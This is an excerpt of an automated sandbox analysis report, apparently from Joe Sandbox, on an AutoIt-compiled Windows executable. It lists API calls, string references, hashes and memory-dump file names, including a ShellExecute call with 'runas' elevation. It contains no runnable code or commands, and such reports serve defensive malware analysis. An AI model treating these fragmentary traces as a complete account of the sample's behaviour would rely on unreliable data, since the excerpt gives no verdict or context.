                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0dda693f0992701eb411b7f7ffdb94925cfe4ddd7e217d163a463dd41a328826
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 78E0DF3228C31826D2203B947C07F987AC98F09B25F10141AF74CB80C28EE268905399
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E7FBBB: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00E80FF1,?,?,?,00E6100A), ref: 00E7FBC0
                                                                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,00E6100A), ref: 00E80FF5
                                                                                                                                                                                                                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00E6100A), ref: 00E81004
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00E80FFF
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                                                                                                                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                                                                      • API String ID: 55579361-631824599
                                                                                                                                                                                                                                      • Opcode ID: 1332056878b71eb7aa685b0e1795c090771c8af2dd5c8df41944cf780787e3d9
                                                                                                                                                                                                                                      • Instruction ID: 28a7e7ca390db51494739be295e0ea8ae593a6f6adcf5abb7765af489255099b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1332056878b71eb7aa685b0e1795c090771c8af2dd5c8df41944cf780787e3d9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A4E092702047518FD374AF39ED443427BE5AF40305F008DACE48AE3291DBB4D488EB91
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00ED37FB
                                                                                                                                                                                                                                      • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00ED3810
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Temp$FileNamePath
                                                                                                                                                                                                                                      • String ID: aut
                                                                                                                                                                                                                                      • API String ID: 3285503233-3010740371
                                                                                                                                                                                                                                      • Opcode ID: 171d7fa91426d772a7d6e98f23087d4b998cec0c532483df0cf79079345c8eb1
                                                                                                                                                                                                                                      • Instruction ID: 2eb6ccb318e51793727f415deb863fdbf0839436ed57dd40a6ba3c41d2de0ba7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 171d7fa91426d772a7d6e98f23087d4b998cec0c532483df0cf79079345c8eb1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BFD05B71504324ABDA20A7519C0EFDB7E6CD745710F0005517A55E10A1DAB4D545CBD0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: LocalTime
                                                                                                                                                                                                                                      • String ID: %.3d$X64
                                                                                                                                                                                                                                      • API String ID: 481472006-1077770165
                                                                                                                                                                                                                                      • Opcode ID: c2488879990a55c2f4c95bcaf3bf7278c1e5d824c1ac29ed0aba4e7683e470de
                                                                                                                                                                                                                                      • Instruction ID: 16e8fa906d818d66f47f170cf0db9fafbe3e17175ba179e4e10bf89d8e386fa9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c2488879990a55c2f4c95bcaf3bf7278c1e5d824c1ac29ed0aba4e7683e470de
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 48D05B71C08118D9CB94D7919C45DFB77FCBF08310F549452F50AF3140E630D508AB22
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00EF2BD1
                                                                                                                                                                                                                                      • PostMessageW.USER32(00000000), ref: 00EF2BD8
                                                                                                                                                                                                                                        • Part of subcall function 00ECF09D: Sleep.KERNEL32 ref: 00ECF115
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                      • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                      • Opcode ID: 34d26a22fba4a718fc668f2582ae8ad66832f435088ccb2cf44188439ad176ec
                                                                                                                                                                                                                                      • Instruction ID: f3d7d079a8d320be3a039839af79d8bb361841e49263d76715961da375f74e36
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 34d26a22fba4a718fc668f2582ae8ad66832f435088ccb2cf44188439ad176ec
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71D0A9313C53106AF22473319C0FFDA2A45AB80B00F000815B345BA1D0C8B06800C258
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00EF2B91
                                                                                                                                                                                                                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00EF2BA4
                                                                                                                                                                                                                                        • Part of subcall function 00ECF09D: Sleep.KERNEL32 ref: 00ECF115
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                      • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                      • Opcode ID: 2e3056f1d183ac5f5a7bf5fddd8054aa190d8b1d03b647cf75e6514a0dfe08b9
                                                                                                                                                                                                                                      • Instruction ID: c13f5cefe0ece01c875dd199c925a1a4d1c2a507baa341e25ec8206283e24480
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2e3056f1d183ac5f5a7bf5fddd8054aa190d8b1d03b647cf75e6514a0dfe08b9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 74D012313D9350BBF2647771DD4FFEA6E55AB90B11F010815B359BA1D1D9F06804C754
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00E9C113
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00E9C121
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00E9C17C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1717984340-0
                                                                                                                                                                                                                                      • Opcode ID: 9669d09c6d9ae74af0e7c1f8a9acc6e9e00f1aff277a22b4d1a663010bc4f86d
                                                                                                                                                                                                                                      • Instruction ID: d1902c9da5198e45d9e68c00d068c96aeebf6465856e920b54f1d0a1027714b9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9669d09c6d9ae74af0e7c1f8a9acc6e9e00f1aff277a22b4d1a663010bc4f86d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DB41C330602205AFDF25AF66CC44BAA7BB5EF41758F346169F859B7192DB308D01CB64
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00EDA3C8
                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00EDA4DB
                                                                                                                                                                                                                                        • Part of subcall function 00ED40C4: GetInputState.USER32 ref: 00ED411B
                                                                                                                                                                                                                                        • Part of subcall function 00ED40C4: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00ED41B6
                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00EDA3F8
                                                                                                                                                                                                                                      • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00EDA4C5
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.42568483488.0000000000E61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42568457636.0000000000E60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569245926.0000000000EFD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569429921.0000000000F23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569503861.0000000000F2D000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569527408.0000000000F31000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569550795.0000000000F35000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState
                                                                                                                                                                                                                                      • String ID: *.*
                                                                                                                                                                                                                                      • API String ID: 1927845040-438819550
                                                                                                                                                                                                                                      • Opcode ID: 13ae86a785ecf42db238d6bce429632a04c0b52c7b0fce7e0a1500945d003647
                                                                                                                                                                                                                                      • Instruction ID: aca5d88364df4c8d0ba74cf2aabdff58c42c9486fd1d0979eeaa89aae2f7191a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 13ae86a785ecf42db238d6bce429632a04c0b52c7b0fce7e0a1500945d003647
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3B418E7194420A9FCF10DFA4CC49AEEBBB4EF05314F145166E815B2291DB709F8ACF52
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,00EA370C), ref: 00ECE28D
                                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 00ECE29C
                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00ECE2AD
                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00ECE2B9
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.42568483488.0000000000E61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42568457636.0000000000E60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569245926.0000000000EFD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569429921.0000000000F23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569503861.0000000000F2D000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569527408.0000000000F31000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569550795.0000000000F35000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2695905019-0
                                                                                                                                                                                                                                      • Opcode ID: 33640ee7578023dfcc9e64c264857a4481f76e3889e679d114b683a1ed1142aa
                                                                                                                                                                                                                                      • Instruction ID: 09f76f7ffbaf491ee9f31ef8db8f0dace44c994bdd048bf4e0b5a657ff17f4e5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 33640ee7578023dfcc9e64c264857a4481f76e3889e679d114b683a1ed1142aa
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C7F0A0304189145BA2186738ED0EABA7B6D9F81338B104709F835E22F0E775A95A86D5
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadIconW.USER32(00000063), ref: 00EC60CC
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00EC60DE
                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 00EC60F5
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00EC610A
                                                                                                                                                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 00EC6110
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00EC6120
                                                                                                                                                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 00EC6126
                                                                                                                                                                                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00EC6147
                                                                                                                                                                                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00EC6161
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00EC616A
                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 00EC620D
                                                                                                                                                                                                                                      • GetDesktopWindow.USER32(?), ref: 00EC6213
                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 00EC621A
                                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00EC6271
                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00EC627E
                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000005,00000000,?), ref: 00EC62A3
                                                                                                                                                                                                                                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00EC62CD
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.42568483488.0000000000E61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42568457636.0000000000E60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569245926.0000000000EFD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569429921.0000000000F23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569503861.0000000000F2D000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569527408.0000000000F31000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569550795.0000000000F35000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3869813825-0
                                                                                                                                                                                                                                      • Opcode ID: f14966478a5431a5b4eaa7f2435eb996bf4221067dad35acf2ef36b08576ec12
                                                                                                                                                                                                                                      • Instruction ID: a71981fd253c0dac857943080e9c5a9550fb181e702bf1fda41c74fa7af9f855
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f14966478a5431a5b4eaa7f2435eb996bf4221067dad35acf2ef36b08576ec12
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 80716A31900609AFDB20DFA9CE45FAFBBF5EB48709F10491CE586B21A0D776E945CB10
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(00F3170C,00000FA0,BB40E64E,?,?,?,?,00EA2633,000000FF), ref: 00E8039C
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00EA2633,000000FF), ref: 00E803A7
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00EA2633,000000FF), ref: 00E803B8
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable,?,?,?,?,00EA2633,000000FF), ref: 00E803CE
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS,?,?,?,?,00EA2633,000000FF), ref: 00E803DC
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable,?,?,?,?,00EA2633,000000FF), ref: 00E803EA
                                                                                                                                                                                                                                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,00EA2633,000000FF), ref: 00E80435
                                                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(00F3170C,00000007,?,?,?,?,00EA2633,000000FF), ref: 00E80461
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00EA2633,000000FF), ref: 00E80471
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • InitializeConditionVariable, xrefs: 00E803C8
                                                                                                                                                                                                                                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00E803A2
                                                                                                                                                                                                                                      • WakeAllConditionVariable, xrefs: 00E803E2
                                                                                                                                                                                                                                      • SleepConditionVariableCS, xrefs: 00E803D4
                                                                                                                                                                                                                                      • kernel32.dll, xrefs: 00E803B3
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.42568483488.0000000000E61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42568457636.0000000000E60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569245926.0000000000EFD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569429921.0000000000F23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569503861.0000000000F2D000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569527408.0000000000F31000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569550795.0000000000F35000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressHandleProc$CriticalModuleSection$CloseCountCreateDeleteEventInitializeSpin
                                                                                                                                                                                                                                      • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                                                                      • API String ID: 3758863719-1714406822
                                                                                                                                                                                                                                      • Opcode ID: ad1e87cdc5a5523327e85002bfad8e5bed90ae9fd09330aefe59e4b341665dbe
                                                                                                                                                                                                                                      • Instruction ID: 485b2fb881bd99be61524dbb53b6cbe59cda3757d806d69ec4b5a88b2c95d6ad
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ad1e87cdc5a5523327e85002bfad8e5bed90ae9fd09330aefe59e4b341665dbe
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7721D132A46705AFD7206BA59C49B7A3BE9FB44B61F041025FA0DF2290DF70DC09E761
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00E62282,?), ref: 00E622D5
                                                                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00E62282,?), ref: 00E622E8
                                                                                                                                                                                                                                      • GetFullPathNameW.KERNEL32(00007FFF,?,?,00F32418,00F32400,?,?,?,?,?,?,00E62282,?), ref: 00E62354
                                                                                                                                                                                                                                        • Part of subcall function 00E63297: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00E6237C,00F32418,?,?,?,?,?,?,?,00E62282,?), ref: 00E632D8
                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,00000001,00F32418,?,?,?,?,?,?,?,00E62282,?), ref: 00E623D5
                                                                                                                                                                                                                                      • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010,?,?,?,?,00E62282,?), ref: 00EA2C3E
                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,00F32418,?,?,?,?,?,?,?,00E62282,?), ref: 00EA2C7F
                                                                                                                                                                                                                                      • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00F23204,00F32418,?,?,?,?,?,?,?,00E62282), ref: 00EA2D08
                                                                                                                                                                                                                                      • ShellExecuteW.SHELL32(00000000,?,?,?,?,?,?,00E62282,?), ref: 00EA2D0F
                                                                                                                                                                                                                                        • Part of subcall function 00E623ED: GetSysColorBrush.USER32(0000000F,00000001,00F33390,?), ref: 00E623F8
                                                                                                                                                                                                                                        • Part of subcall function 00E623ED: LoadCursorW.USER32(00000000,00007F00), ref: 00E62407
                                                                                                                                                                                                                                        • Part of subcall function 00E623ED: LoadIconW.USER32(00000063), ref: 00E6241D
                                                                                                                                                                                                                                        • Part of subcall function 00E623ED: LoadIconW.USER32(000000A4), ref: 00E6242F
                                                                                                                                                                                                                                        • Part of subcall function 00E623ED: LoadIconW.USER32(000000A2), ref: 00E62441
                                                                                                                                                                                                                                        • Part of subcall function 00E623ED: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E62459
                                                                                                                                                                                                                                        • Part of subcall function 00E623ED: RegisterClassExW.USER32(?), ref: 00E624AA
